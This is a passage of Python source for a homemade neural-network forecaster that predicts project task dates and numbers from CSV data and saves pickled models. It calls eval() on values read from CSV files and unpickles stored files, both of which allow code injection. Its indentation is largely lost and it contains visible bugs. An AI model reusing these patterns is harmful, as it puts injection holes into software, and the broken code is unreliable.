if linearegression==1:
name='output'
self.output=self.reluneurone(name,resistance=0,bayeslearningrate=bayeslearningrate)
self.mind.append(cortex.copy())
name='output'
self.output=self.reluneurone(name,resistance=0,bayeslearningrate=bayeslearningrate)
def labotomy(self,width=[4,4,4,4,4],typo=['r','r','r','r','r','r'],resistance=[0,0,0,0,0,0],bayeslearningrate=[10,10,10,10,10],linearegression=[0,0,0,0,0]):
count=0
work=4
self.mind=[]
rest=0
bayes=10
c=0
for i in range(len(typo)):
try:
work=width[count]
rest=resistance[count]
bayes=bayeslearningrate[count]
except:
pass
cortex=[]
for w in range(work):
c+=1
name=str("No:"+str(c)+" row:"+str(i)+" width:"+str(w))
if typo[i].lower()=='r':
                    cortex.append(self.reluneurone(name,resistance=rest,bayeslearningrate=bayes))
if typo[i].lower()=='s':
                    cortex.append(self.sigmoidneurone(name,resistance=rest,bayeslearningrate=bayes))
if typo[i].lower()=='t':
                    cortex.append(self.tanhneurone(name,resistance=rest,bayeslearningrate=bayes))
            if linearegression[i]==1:
name='output'
                self.output=self.reluneurone(name,resistance=rest,bayeslearningrate=bayes)
self.mind.append(cortex.copy())
count+=1
name='output'
        self.output=self.reluneurone(name,resistance=rest,bayeslearningrate=bayes)
def forwardpage(self,inputs,error=0):
output=0
nay={}
bay={}
responsenay={}
responsebay={}
for i in inputs:
if isinstance(i,(int,float)):
nay[i]=i
bay[i]=i
else:
nay[i]=1
bay[i]=1
if error==2:
print(inputs)
for cortex in range(len(self.mind)):
responsenay={}
responsebay={}
for nerve in self.mind[cortex]:
response=nerve.forward(nay,bay)
if len(response) >0:
responsenay[response[0]]=response[1]
responsebay[response[0]]=response[2]
if len(responsenay)==0:
for nerve in self.mind[cortex]:
nerve.nonresponse(bay)
if error==2:
print(responsenay)
print(responsebay)
input("pause error 2 at forward page")
nay=responsenay
bay=responsebay
response=self.output.forward(nay,bay)
if len(response)==0:
self.output.nonresponse(bay)
self.output.nonresponse(bay)
else:
output=response[1]
return output
def slow(self):
for cortex in range(len(self.mind)):
for nerve in self.mind[cortex]:
nerve.experience()
def backapage(self,actual,estimate,error=0):
nex=[]
r=[]
if estimate==None:
estimate=0
nex=self.output.backwards(float(actual),float(estimate),[])
#print(nex)
#input()
for cortex in reversed(self.mind):
for nerve in cortex:
try:
response=nerve.backwards(float(actual),float(estimate),nex)
for re in response:
if not re in r:
r.append(re)
except Exception as ex:
pass
nex=r
#print(nex)
#input("Previous Rows")
self.fired=0
def learnbook(self,reader,element,accuracy=30,epochs=10,error=0,key=0,SECONDREAD=0):
estimate=0
lastcount=1
count=1
rightcount=0
mike=0
check=0
for row in reader:
if row.get(element):
project_list=list(row.values())
project_list.remove(row.get(element))
estimate=self.forwardpage(project_list)
self.backapage(row.get(element),estimate)
step=0
temp=0
while step < epochs:
lastcount=rightcount
consider=[0,0,0,0,0,0,0,0,0,0,0,0,0]
count=1
for row in reader:
if row.get(element):
count+=1
project_list=list(row.values())
if key !=0:
project_list.remove(row.get(key))
project_list.remove(row.get(element))
estimate=self.forwardpage(project_list)
if row.get(element) !=0:
self.backapage(row.get(element),estimate)
if error==1:
print(estimate)
print(row.get(element))
input("pause for error in learnbook")
try:
temp=int(round(abs(estimate-row.get(element))/accuracy,0))
except:
pass
try:
consider[temp]+=1
except Exception as ex:
pass
if error==1:
print(project_list)
print(row.get(element))
print(estimate)
print(lastcount)
input("pause error 1 in learnbook")
cumu=0
rightcount=consider[0]/count
if rightcount <check:
self.slow()
check=rightcount
for i in range(len(consider)):
cumu+=((consider[i]/count)*100)
#print("Within a accuracy " + str(i) + " we had a accuracy of " + str((consider[i]/count)*100) + " with cumulatve of " + str(cumu))
step+=1
#print("New Epoch " + str(step))
if isinstance(SECONDREAD,list):
for row in SECONDREAD:
project_list=list(row.values())
project_list.remove(row.get(element))
if key !=0:
project_list.remove(row.get(key))
estimate=self.forwardpage(project_list)
#if estimate < accuracy:
# estimate=accuracy
if error==2:
print(row)
print(project_list)
input("Error 2 in learnbook")
try:
row["ESTIMATE"]=round(estimate,0)
except:
row["ESTIMATE"]="None response from AI, unrecognised engram - pleaser forecast manually"
return SECONDREAD
def prognosticate(self,reader,key,element):
newreader=[]
for row in reader:
newrow={}
project_list=list(row.values())
project_list.remove(row.get(element))
estimate=self.forwardpage(project_list)
if estimate < 30:
estimate=30
for cortex in reversed(self.mind):
for nerve in cortex:
nerve.reset()
estimate=round(estimate,0)
newrow[key]=row[key][-(len(row[key])-(len(key)+1)):]
newrow[str(element)+" Estimate"]=estimate
newreader.append(newrow.copy())
return newreader
def testday(self,reader,accuracy,element,key=0):
newreader=[]
step=0
count=0
eva=0
eve=0
errors=0
checkframe=[]
fileframe=[]
column=0
row=0
for row in reader:
try:
eve+=row.get(element)
count+=1
except:
print(row)
print(row.get(element))
input("error in testday")
try:
average=eve/count
except:
average=0
eve=0
count=0
var=0
hypo=0
for row in reader:
count+=1
newrow={}
project_list=list(row.values())
project_list.remove(row.get(element))
if key !=0:
project_list.remove(row.get(key))
estimate=self.forwardpage(project_list)
try:
eva=estimate-row.get(element)
except:
errors+=1
if abs(eva) < accuracy:
step+=1
var=abs(row.get(element)-average)
hypo+=(var*var)
eve+=(eva*eva)
for cortex in reversed(self.mind):
for nerve in cortex:
nerve.reset()
try:
return [(step/count),(eve/count),errors,hypo/count,]
except:
return [0,0,errors,0,]
def __init__(self,reader,key,startdate,endate,renamekey,start=1,accuracy=15,csvloci=r'C:\CSVs\\',setcritdelay=14,setalert=0,taskmove=1,setpercntile=0.95,setdependency=1):
self.source=[]
self.innaccurate=[]
self.accuraccy=accuracy
self.key=key
self.uPDATE=0
self.renamekey=renamekey
self.startdate=startdate
import os
directory=csvloci+'Analysis\\'
if not os.path.exists(directory):
try:
os.makedirs(directory)
except OSError:
print ('Error: Creating directory. ' + directory)
self.csvloci=directory
directory=csvloci+'BrainsInAJar\\'
if not os.path.exists(directory):
try:
os.makedirs(directory)
except OSError:
print ('Error: Creating directory. ' + directory)
self.geniusloci=directory
directory=csvloci+'Analysis\\'
if not os.path.exists(directory):
try:
os.makedirs(directory)
except OSError:
print ('Error: Creating directory. ' + directory)
self.analysisloci=directory
directory=csvloci+'HIVE\\'
if not os.path.exists(directory):
try:
os.makedirs(directory)
except OSError:
print ('Error: Creating directory. ' + directory)
self.hiveloci=directory
self.enddate=endate
self.hive(reader,startdate)
if start!=0:
if start=="test":
self.randomdata()
else:
self.swarm()
#self.workplanner()
def run(self,reader,queenme=0):
if len(self.deps)==0:
try:
self.deps=self.Open(file_Name=self.geniusloci + '\DEPENDENCIES_FILE')
if self.deps==False:
self.deps={}
except:
self.deps={}
try:
self.tickboxes=self.Open(file_Name=self.geniusloci + '\TICKBOX_FILE')
if self.tickboxes==False:
self.tickboxes={}
except:
self.tickboxes={}
try:
self.alerts=self.Open(file_Name=self.geniusloci +'\ALERT_FILE')
if self.alerts==False:
self.alerts={}
except:
self.alerts={}
try:
self.critime=self.Open(file_Name=self.geniusloci +'\CRITIME_FILE')
if self.critime==False:
self.critime={}
except:
self.critime={}
try:
self.hardforward=self.Open(file_Name=self.geniusloci+'\HARD_FILE')
if self.hardforward==False:
self.hardforward={}
except:
self.hardforward={}
self.hive(reader,self.startdate)
        x = threading.Thread(target=self.swarm, args=())
x.start()
q = threading.Thread(target=self.reforecast, args=())
q.start()
if queenme==1:
queeme=threading.Thread(target=self.queen, args=())
queeme.start()
def reference(self):
print("Building the Hive")
print("this is the dates i have found")
print(self.dates)
print(len(self.dates))
print("this is the labels i have found")
print(self.kill)
print(len(self.kill))
print("this is the numbers i have found")
print(self.numbers)
print(len(self.numbers))
def hive(self,reader,startdate,error=0):
def inreader(row,reader,key):
count=0
for newrow in reader:
if row[key]==newrow[key]:
return count
count+=1
return False
def addrow(row,startdate):
newrow={}
newrow["end"]=row[self.enddate]
newrow[self.key]=row[self.key]
newrow[startdate]=row[startdate]
datarea={}
for d in self.dates:
temp=self.tryfindcmrdates(newrow[startdate],row[d])
try:
if temp > 0:
dateme[d]=1
except:
pass
datarea[d]=self.tryfindcmrdates(newrow[startdate],row[d])
#print(datarea.copy())
#input()
newrow["Dates"]=datarea.copy()
datarea={}
for n in self.numbers:
try:
if isinstance(float(row[n]),(float,int)):
datarea[n]=float(row[n])
else:
datarea[n]=None
except:
datarea[n]=None
pass
newrow["Numbers"]=datarea.copy()
for k in self.kill:
if k in row:
if isinstance(row[k],str):
if not self.isdate(row[k]):
if not len(row[k])==0:
if error==1:
print(row[self.key])
print(k)
input(row[k])
datarea[k]=str(k)+':' +str(row[k])
newrow["Labels"]=datarea.copy()
if row[self.key] in tempforecastdates:
newrow["Forecast Dates"]=tempforecastdates[row[self.key]]
del tempforecastdates[row[self.key]]
else:
newrow["Forecast Dates"]={}
if row[self.key] in tempforecastnumbers:
newrow["Forecast Numbers"]=tempforecastnumbers[row[self.key]]
del tempforecastnumbers[row[self.key]]
else:
newrow["Forecast Numbers"]={}
newrow["Reforecast Dates"]={}
newrow["Overide Dates"]={}
newrow["Overide Numbers"]={}
return newrow
if len(self.source)==0:
tech=[]
self.dates=[]
self.numbers=[]
self.kill=[]
tempforecastdates={}
tempforecastnumbers={}
for s in self.source:
tempforecastdates[s[self.key]]=s["Forecast Dates"]
tempforecastnumbers[s[self.key]]=s["Forecast Numbers"]
for row in reader:
for cell in row:
if self.isdate(row[cell]) and cell !=self.key and cell !=startdate:
if not cell in self.dates:
self.dates.append(cell)
try:
if isinstance(float(row[cell]),(float,int)):
if cell !=self.key and cell !=startdate:
if not cell in self.numbers:
self.numbers.append(cell)
except:
pass
if isinstance(row[cell],str) and cell !=self.key and cell !=startdate:
if not isinstance(row[cell],(float,int)):
if not cell in self.kill:
self.kill.append(cell)
now=''
now=self.today
for row in reader:
tech.append(addrow(row,self.startdate))
self.source=tech
else:
temp=[]
for row in reader:
                temp=inreader(row,self.source,self.key)
if temp==False:
self.source.append(addrow(row,now))
else:
for d in self.dates:
self.source[temp]["Dates"][d]=row[d]
for n in self.numbers:
self.source[temp]["Numbers"][n]=row[n]
for k in self.kill:
self.source[temp]["Labels"][k]=row[k]
def swarm(self,error=0):
print("Forecasting Dates")
for d in self.dates:
tempreader=[]
otherereader=[]
for row in self.source:
if not d in row["Labels"]:
newrow={}
newrow["TARGET"]=row["Dates"][d]
for k in row["Labels"]:
if k !=d:
newrow[k]=row["Labels"][k]
newrow[self.key]=row[self.key]
if newrow["TARGET"]==None:
otherereader.append(newrow.copy())
else:
if newrow["TARGET"] < 0:
newrow["TARGET"]=0
tempreader.append(newrow.copy())
elif error==1:
print(row[self.key])
print(d)
input()
#print(d)
#self.timestamp()
#print(len(tempreader))
#print(len(otherereader))
#try:
r2=[]
#print(d)
STRING=d.replace('/','-')
mymind=self.Open(file_Name=self.geniusloci + '\prognostication' + STRING + '_BRAININAJAR')
if mymind==False:
mymind=self.mind(4,5)
epo=1
else:
epo=1
r2=mymind.learnbook(tempreader,"TARGET",accuracy=self.accuraccy,epochs=epo,key=self.key,SECONDREAD=otherereader)
for row in self.source:
row=self.updaterow(row,r2,self.key,d)
self.Save(mymind,file_Name=self.geniusloci + '\prognostication' + STRING + '_BRAININAJAR')
self.csvwrite(r2,CSV=self.hiveloci + '\prognostication' + STRING + '_OUTPUT.csv',KEY=self.key,NEWKEY=self.renamekey)
csv=[]
#print(self.csvloci+'\Test_Records_' + STRING + '_OUTPUT.csv')
csv=self.csvopen(x=(self.csvloci+'\Test_Records_' + STRING + '_OUTPUT.csv'))
vale=mymind.testday(tempreader,self.accuraccy,"TARGET",key=self.key)
data={}
data["Type"]=d
data["Accuraccy"]=vale[0]
data["Loss Function"]=vale[1]
data["Date"]=self.today()
data["Variance Around Average"]=vale[3]
if vale[3]==0:
data["Hypothesis Test"]="Error in hypothesis test"
else:
data["Hypothesis Test"]=vale[1]/vale[3]
if vale[1]/vale[3] > 1:
self.innaccurate.append(d)
elif d in self.innaccurate:
self.innaccurate.remove(d)
data["Errors"]=vale[2]
csv.append(data)
self.csvwrite(csv,CSV=self.analysisloci +'\Test_Records_' + STRING + '_OUTPUT.csv',KEY="Type",NEWKEY=0)
#except:
# print(d)
# print("We found no instances of this to forecast, press enter too accept")
# input()
tempreader=[]
LOAD=''
concat=''
unload=[]
for row in self.source:
if len(row["end"]) == 0:
try:
unload=min(row["Forecast Dates"])
except:
print(row["Dates"])
print(row["Forecast Dates"])
input()
datarea={}
datarea[self.key]=row[self.key]
datarea["Next Task"]=unload
datarea["Date"]=self.today()
tempreader.append(datarea.copy())
self.csvwrite(tempreader,CSV=self.analysisloci + 'prognostication' + '_Next_Task_' + '_OUTPUT.csv',KEY=self.key,NEWKEY=self.renamekey)
self.uPDATE=0
print("Forecasting Numbers")
for d in self.numbers:
tempreader=[]
otherereader=[]
for row in self.source:
newrow={}
newrow[self.key]=row[self.key]
if len(row["end"])>0:
#print(row["Numbers"])
#print(row["end"])
#input()
newrow["TARGET"]=row["Numbers"][d]
else:
newrow["TARGET"]=None
for k in row["Labels"]:
if k !=d:
newrow[k]=row["Labels"][k]
if newrow["TARGET"]==None:
otherereader.append(newrow.copy())
elif isinstance(newrow["TARGET"],(int,float)):
tempreader.append(newrow.copy())
if len(tempreader) >0:
#try:
r2=[]
#print(d)
STRING=d.replace('/','-')
mymind=self.Open(file_Name=self.geniusloci + '\prognostication' + STRING + '_BRAININAJAR')
if mymind==False:
mymind=self.mind(4,5)
epo=1
else:
epo=1
r2=mymind.learnbook(tempreader,"TARGET",accuracy=self.accuraccy,epochs=epo,key=self.key,SECONDREAD=otherereader)
STRING=d.replace('/','-')
self.csvwrite(r2,CSV=self.hiveloci + '\prognostication' + STRING + '_OUTPUT.csv',KEY=self.key,NEWKEY=self.renamekey)
self.Save(mymind,file_Name=self.geniusloci + '\prognostication' + STRING + '_BRAININAJAR')
#except:
# print(d)
# print("We found no instances of this to forecast, press enter too accept")
# input()
csv=[]
csv=self.csvopen(x=(self.csvloci+'\Test_Records_' + STRING + '_OUTPUT.csv'))
vale=mymind.testday(tempreader,self.accuraccy,"TARGET",key=self.key)
data={}
data["Type"]=d
data["Accuraccy"]=vale[0]
data["Loss Function"]=vale[1]
data["Date"]=self.today()
data["Variance Around Average"]=vale[3]
if vale[3]==0:
data["Hypothesis Test"]="Error in hypothesis test"
else:
data["Hypothesis Test"]=vale[1]/vale[3]
if vale[1]/vale[3] > 1:
self.innaccurate.append(d)
elif d in self.innaccurate:
self.innaccurate.remove(d)
data["Errors"]=vale[2]
csv.append(data)
self.csvwrite(csv,CSV=self.analysisloci + '\Test_Records_' + STRING + '_OUTPUT.csv',KEY="Type",NEWKEY=0)
self.swarmin=0
print("Innaccurate models detected")
print(self.innaccurate)
def Save(self,a,file_Name):
import pickle
fileObject = open(file_Name,'wb')
pickle.dump(a,fileObject)
fileObject.close()
def Open(self,file_Name):
import os.path
if os.path.isfile(file_Name)==True:
import pickle
fileObject = open(file_Name,'rb')
try:
b = pickle.load(fileObject,encoding="utf8")
return b
except:
print(file_Name)
print("got a error in opening pickle RESTARTING FILE")
return False
else:
return False
def updaterow(self,row,r2,key,d,look="Forecast Dates",error=0):
for r in r2:
if row[self.key]==r[self.key]:
if r["ESTIMATE"] !="None response from AI, unrecognised engram - pleaser forecast manually":
row[look][d]=r["ESTIMATE"]
return row
return row
def isdate(self,check):
from datetime import datetime
try:
h=check.split('/')
x=datetime(int(h[2]), int(h[1]), int(h[0]), 0, 0, 0, 0)
return True
except:
return False
def today(self):
from datetime import datetime
check = datetime.now()
return (str(check.day)+'/'+str(check.month)+'/'+str(check.year))
def tryfindcmrdates(self,a,b):
from datetime import datetime
try:
h=a.split('/')
x=datetime(int(h[2]), int(h[1]), int(h[0]), 0, 0, 0, 0)
t=b.split('/')
t=datetime(int(t[2]), int(t[1]), int(t[0]), 0, 0, 0, 0)
dt = t - x
return dt.days
except:
return None
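    # Illustrative example: tryfindcmrdates expects day/month/year strings, e.g.
    #   self.tryfindcmrdates('01/02/2020', '15/02/2020')  ->  14
    # and returns None whenever either value fails to parse as d/m/Y.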
def csvwrite(self,reader,CSV='C:\CSVs\OUTPUT.csv',KEY=0,NEWKEY=0):
import csv
fieldnombre=[]
for row in reader:
for cell in row:
if not cell in fieldnombre:
fieldnombre.append(cell)
if NEWKEY !=0:
try:
fieldnombre.remove(KEY)
except:
pass
fieldnombre.append(NEWKEY)
for row in reader:
row[NEWKEY]=row.get(KEY)
frame=[]
with open(CSV, 'w', newline='') as csvfile:
spamwriter = csv.writer(csvfile, delimiter=',',
quotechar='"', quoting=csv.QUOTE_MINIMAL)
spamwriter.writerow(fieldnombre)
for row in reader:
frame=[]
for field in fieldnombre:
frame.append(row.get(field))
spamwriter.writerow(frame.copy())
csvfile.close()
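    # Illustrative usage (field names here are made up): when NEWKEY is given,
    #   self.csvwrite(rows, CSV=r'C:\CSVs\out.csv', KEY='id', NEWKEY='Project Ref')
    # drops the 'id' header, copies each row's 'id' value into a 'Project Ref'
    # column, and writes the rows out with csv.writer.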
def csvopen(self,x):
import csv
import os.path
if os.path.isfile(x)==False:
return []
with open(x, newline='') as csvfile:
data = csv.DictReader(csvfile)
reader = [item for item in data]
newreader=[]
data=None
count=0
return reader
def randomdata(self):
import random
for row in self.source:
for d in self.dates:
row["Forecast Dates"][d]=random.randint(0,120)
for n in self.numbers:
row["Forecast Numbers"][d]=random.randint(0,120)
def multitest(self,reader,tag):
innaccurate=[]
def makeworksheet(typo,reader,num):
newreader=[]
if num==True:
for row in reader:
if self.key in row:
newrow={}
try:
newrow[self.key]=row[self.key]
except:
print(row)
print(newrow)
input("error in makeworksheet")
if isinstance(row[typo],(int,float)):
newrow["TARGET"]=self.tryfindcmrdates(row[self.startdate],row[typo])
for k in self.kill:
if k in row:
if isinstance(row[k],str):
if not self.isdate(row[k]):
if not len(row[k])==0:
newrow[k]=str(k)+':' +str(row[k])
newreader.append(newrow.copy())
else:
for row in reader:
if self.key in row:
newrow={}
try:
newrow[self.key]=row[self.key]
except:
print(row)
print(newrow)
input("error in makeworksheet")
if self.isdate(row[self.startdate]):
if self.isdate(row[typo]):
newrow["TARGET"]=self.tryfindcmrdates(row[self.startdate],row[typo])
for k in self.kill:
if k in row:
if isinstance(row[k],str):
if not self.isdate(row[k]):
if not len(row[k])==0:
newrow[k]=str(k)+':' +str(row[k])
newreader.append(newrow.copy())
return newreader
for d in self.dates:
tempreader=makeworksheet(d,reader,False)
print("multitest")
print(d)
print(len(tempreader))
if len(tempreader)>0:
STRING=d.replace('/','-')
mymind=self.Open(file_Name=self.geniusloci + '\prognostication' + STRING + '_BRAININAJAR')
csv=[]
csv=self.csvopen(x=(self.csvloci+'\Test_Records_' + STRING + '_OUTPUT.csv'))
try:
vale=mymind.testday(tempreader,self.accuraccy,"TARGET",key=self.key)
except:
print(vale)
input("error")
data={}
data["Type"]=d
data["Accuraccy"]=vale[0]
data["Loss Function"]=vale[1]
data["Date"]=self.today()
data["Tag"]=tag
data["Variance Around Average"]=vale[3]
if vale[3]==0:
data["Hypothesis Test"]="Error in hypothesis test"
else:
data["Hypothesis Test"]=vale[1]/vale[3]
if vale[1]/vale[3] > 1:
innaccurate.append(d)
data["Errors"]=vale[2]
csv.append(data)
self.csvwrite(csv,CSV=self.analysisloci + '\Test_Records_' + STRING + '_OUTPUT.csv',KEY="Type",NEWKEY=0)
for d in self.numbers:
tempreader=makeworksheet(d,reader,True)
print("multitest")
print(d)
print(len(tempreader))
if len(tempreader)>0:
STRING=d.replace('/','-')
mymind=self.Open(file_Name=self.geniusloci + '\prognostication' + STRING + '_BRAININAJAR')
csv=[]
csv=self.csvopen(x=(self.csvloci+'\Test_Records_' + STRING + '_OUTPUT.csv'))
vale=mymind.testday(tempreader,self.accuraccy,"TARGET",key=self.key)
data={}
data["Type"]=d
data["Accuraccy"]=vale[0]
data["Loss Function"]=vale[1]
data["Date"]=self.today()
data["Tag"]=tag
data["Variance Around Average"]=vale[3]
if vale[3]==0:
data["Hypothesis Test"]="Error in hypothesis test"
else:
data["Hypothesis Test"]=vale[1]/vale[3]
if vale[1]/vale[3] > 1:
innaccurate.append(d)
data["Errors"]=vale[2]
csv.append(data)
self.csvwrite(csv,CSV=self.analysisloci + '\Test_Records_' + STRING + '_OUTPUT.csv',KEY="Type",NEWKEY=0)
print("Inaccuracies in Historic Data Found")
print(innaccurate)
def workplanner(self,setcritdelay=0,setalerts=0,taskmove=0,setpercntile=0,setdependency=0):
averageburndown={}
countdates={}
burndown=0
evaluate=[]
csv=[]
csv=self.csvopen(x=(self.hiveloci+'\RESOURCE PLAN.csv'))
if len(csv)==0:
for d in self.dates:
newrow={}
newrow["Type"]=d
csv.append(newrow.copy())
self.csvwrite(csv,CSV=(self.csvloci+'\RESOURCE PLAN.csv'),KEY=0,NEWKEY=0)
newrow={}
dat={}
for c in csv:
dat[c['Task']]={}
for s in c:
if s !=dat[c['Task']]:
dat[c['Task']][s]=c[s]
for row in self.source:
if len(row[self.startdate])>0:
if len(row["end"])==0:
todah=self.tryfindcmrdates(row[self.startdate],self.today())
for d in row["Forecast Dates"]:
if not d in self.innaccurate:
if row["Dates"][d]==None:
if not d in row["Labels"]:
count=1
check=1
reforecast=0
newrow={}
for e in row["Forecast Dates"]:
if not e in self.innaccurate:
if e !=d:
if not e in row["Labels"]:
if row["Forecast Dates"][e]!=None:
if row["Dates"][e]!= None and row["Forecast Dates"][d]>row["Dates"][e]:
count+=1
elif row["Forecast Dates"][d]>row["Forecast Dates"][e]:
count+=1
if row["Dates"][e]==None:
check+=1
burndown=row["Forecast Dates"][d]/count
if burndown < 0 or burndown==row["Forecast Dates"][d]:
burndown=0
reforecast=round(todah+(check*burndown))
newrow[self.renamekey]=row[self.key]
newrow["Reforecast"]=reforecast
newrow["Burndown"]=burndown
newrow["Type"]=d
newrow["Previous Tasks"]=count
newrow["Original Forecast"]=row["Forecast Dates"][d]
newrow["Previous Tasks Remainder"]=check
if todah > row["Forecast Dates"][d]:
if todah > (row["Forecast Dates"][d]*1.5):
newrow["Late Flag"]="Late - long delay"
else:
newrow["Late Flag"]="Late"
elif reforecast < row["Forecast Dates"][d]:
newrow["Late Flag"]="Running Ahead"
elif (row["Forecast Dates"][d]-reforecast)<burndown:
newrow["Late Flag"]="On Schedule"
else:
newrow["Late Flag"]="Behind Schedule"
if d in dat:
for a in dat[d]:
if a !=d:
newrow[a]=dat[d][a]
evaluate.append(newrow.copy())
self.csvwrite(evaluate,CSV=(self.hiveloci+'\prognostication_REFORECAST.csv'),KEY=0,NEWKEY=0)
def scheduletests(self):
csv=[]
import collections
for me in self.dates:
import random
ra=[]
for m in range(20):
ra.append(m)
print(ra)
ra=random.sample(ra,len(ra))
print(ra)
for L in range(1):
for r in ra:
for b in ra:
for d in ra:
for w in ra:
newrow=collections.OrderedDict()
newrow["Type"]=me
newrow["width"]=w+1
newrow["depth"]=d+1
newrow["resistance"]=r/10
newrow["bayeslearningrate"]=b+1
newrow["linearegression"]=L
newrow["epochs"]=1
newrow["n"]=False
yield newrow
for d in self.numbers:
for l in range(1):
for r in ra:
for b in ra:
for d in ra:
for w in ra:
newrow=collections.OrderedDict()
newrow["Type"]=d
newrow["width"]=w+1
newrow["depth"]=d+1
newrow["resistance"]=r/10
newrow["bayeslearningrate"]=b+1
newrow["linearegression"]=l
newrow["epochs"]=1
newrow["n"]=True
yield newrow
def makeworksheet(self,d,reader,num):
if num==True:
tempreader=[]
otherereader=[]
for row in self.source:
newrow={}
newrow[self.key]=row[self.key]
if len(row["end"])>0:
#print(row["Numbers"])
#print(row["end"])
#input()
newrow["TARGET"]=row["Numbers"][d]
else:
newrow["TARGET"]=None
for k in row["Labels"]:
if k !=d:
newrow[k]=row["Labels"][k]
if newrow["TARGET"]!=None:
if newrow["TARGET"] > 0:
otherereader.append(newrow.copy())
else:
tempreader.append(newrow.copy())
else:
tempreader=[]
otherereader=[]
for row in self.source:
if not d in row["Labels"]:
newrow={}
newrow["TARGET"]=row["Dates"][d]
for k in row["Labels"]:
if k !=d:
newrow[k]=row["Labels"][k]
newrow[self.key]=row[self.key]
if newrow["TARGET"]==None:
otherereader.append(newrow.copy())
else:
if newrow["TARGET"] < 0:
newrow["TARGET"]=0
tempreader.append(newrow.copy())
return [tempreader,otherereader]
def queen(self,overide=0):
def chack(reader,find):
for row in reader:
if row["Type"]==find:
return True
return False
def getacc(tye):
STRING=tye.replace('/','-')
try:
CSV=self.csvopen(self.analysisloci + '\Test_Records_' + STRING + '_OUTPUT.csv')
except:
return False
ROW=CSV[(len(CSV)-1)]
vale=[]
vale.append(float(ROW["Loss Function"]))
vale.append(eval(ROW["Accuraccy"]))
vale.append((len(CSV)))
return vale
bestwidth=0
otherereader=[]
tempreader=[]
val1=[]
val2=[]
import random
import collections
comptests=[]
#def __init__(self,width,depth,repeat=0,resistance=0,bayeslearningrate=10,linearegression=0):
#def labotomy(self,width=[4,4,4,4,4],typo=['r','r','r','r','r','r'],resistance=[0,0,0,0,0,0],bayeslearningrate=[10,10,10,10,10]):
csv=self.csvopen(x=(self.csvloci+'\Test_Records_SCHEDULED_TESTS.csv'))
newcsv=[]
ty=''
for row in csv:
if len(row["date"])>0:
work=[]
if not ty ==row["Type"]:
ty =row["Type"]
tempreader=[]
otherereader=[]
work=self.makeworksheet(row["Type"],self.source,row["number"])
tempreader=work[0]
otherereader=work[1]
testmind=self.mind(width=int(row["width"]),depth=int(row["depth"]),resistance=int(row["resistance"]),bayeslearningrate=int(row["bayeslearningrate"]),linearegression=int(row["linearegression"]))
try:
if len(row["labotomy.width"]) > 0:
testmind.labotomy(width=eval(row["labotomy.width"]),depth=eval(row["labotomy.width"]),resistance=int(row["labotomy.resistance"]),bayeslearningrate=eval(row["labotomy.bayeslearningrate"]),linearegression=eval(row["labotomy.linearegression"]))
except:
pass
testmind.learnbook(tempreader,"TARGET",accuracy=int(row["accuracy"]),epochs=int(row["epochs"]),key=self.key,SECONDREAD=otherereader)
val1=getacc(row["Type"])
val1e=testmind.testday(tempreader,int(row["accuracy"]),"TARGET",key=self.key)
row["percentage"]=val1e[0]
row["loss function"]=val1e[1]
row["date"]=self.today()
if val1e[0] > val1[0] and val1e[1] > val1[1]:
row["acceptance"]=1
STRING=str(row["Type"])
STRING=STRING.replace('/','-')
self.Save(testmind,file_Name=r'C:\CSVs\BrainsInAJar\prognostication' + STRING + '_BRAININAJAR')
row["Test passed type"]="Scheduled Test Passed"
comptests.append(row.copy())
self.csvwrite(comptests,CSV=(self.csvloci+'\Test_Records_COMPLETED_TESTS.csv'),KEY=0,NEWKEY=0)
else:
row["acceptance"]=0
c=0
import time
if len(comptests)==0:
genny=self.scheduletests()
ty=''
for row in genny:
work=[]
if ty !=row["Type"]:
tempreader=[]
otherereader=[]
ty =row["Type"]
work=self.makeworksheet(row["Type"],self.source,row["n"])
tempreader=work[0]
otherereader=work[1]
val1=getacc(row["Type"])
testmind=self.mind(width=int(row["width"]),depth=int(row["depth"]),resistance=int(row["resistance"]),bayeslearningrate=int(row["bayeslearningrate"]),linearegression=int(row["linearegression"]))
testmind.learnbook(tempreader,"TARGET",accuracy=self.accuraccy,epochs=val1[2],key=self.key,SECONDREAD=otherereader)
count=0
val1e=testmind.testday(tempreader,self.accuraccy,"TARGET",key=self.key)
row["percentage original"]=val1e[0]
row["loss function"]=val1e[1]
row["date"]=self.today()
print("%")
print(val1e[0])
print("old")
print(val1[1])
print("loss")
print(val1e[1])
print("old")
print(val1[0])
print("epochs")
print(val1[2])
print(len(tempreader))
print(len(otherereader))
print(str(row["depth"]))
print(str(row["width"]))
print(str(row["resistance"]))
print(str(row["bayeslearningrate"]))
if val1e[0] > val1[1] and val1e[1] < val1[0]:
val1[1]=val1e[0]
val1[0]=val1e[1]
print("upgrade")
row["acceptance"]=1
STRING=str(row["Type"])
STRING=STRING.replace('/','-')
print(STRING)
self.Save(testmind,file_Name=r'C:\CSVs\BrainsInAJar\prognostication' + STRING + '_BRAININAJAR')
row["Test passed type"]="Auto Generated Test Passed"
comptests.append(row.copy())
self.csvwrite(comptests,CSV=(self.csvloci+'\Test_Records_COMPLETED_TESTS.csv'),KEY=0,NEWKEY=0)
csv=self.csvopen(x=(self.csvloci+'\Test_Records_COMPLETED_TESTS.csv'))
for row in csv:
            testmind=self.mind(width=int(row["width"]),depth=int(row["depth"]),resistance=int(row["resistance"]),bayeslearningrate=int(row["bayeslearningrate"]),linearegression=int(row["linearegression"]))
if len(row["labotomy.width"]) > 0:
testmind.labotomy(width=eval(row["labotomy.width"]),depth=eval(row["labotomy.width"]),resistance=int(row["labotomy.resistance"]),bayeslearningrate=eval(row["labotomy.bayeslearningrate"]),linearegression=eval(row["labotomy.linearegression"]))
            c=float('inf')
d=0
work=self.makeworksheet(row["Type"],self.source)
tempreader=work[0]
otherereader=work[1]
testmind.learnbook(tempreader,"TARGET",accuracy=int(row["accuraccy"]),epochs=1,key=self.key,SECONDREAD=otherereader)
vale=testmind.testday(tempreader,int(row["accuraccy"]),"TARGET",key=self.key)
count=1
while vale[1] < c and vale[2] > d:
testmind.learnbook(tempreader,"TARGET",accuracy=int(row["accuraccy"]),epochs=1,key=self.key,SECONDREAD=otherereader)
vale=testmind.testday(tempreader,int(row["accuraccy"]),"TARGET",key=self.key)
count+=1
count-=1
newrow=row.copy()
newrow["epochs"]=count
self.Save(testmind,file_Name=self.geniusloci + '\prognostication' + str(row["Type"]) + '_BRAININAJAR')
newrow["Test passed type"]="Evaluation of earlystopping"
csv.append(newrow.copy())
self.csvwrite(csv,CSV=(self.csvloci+'\Test_Records_COMPLETED_TESTS.csv'),KEY=0,NEWKEY=0)
self.queenIN=0
def timestamp(self):
import datetime
now = datetime.datetime.now()
print(now)
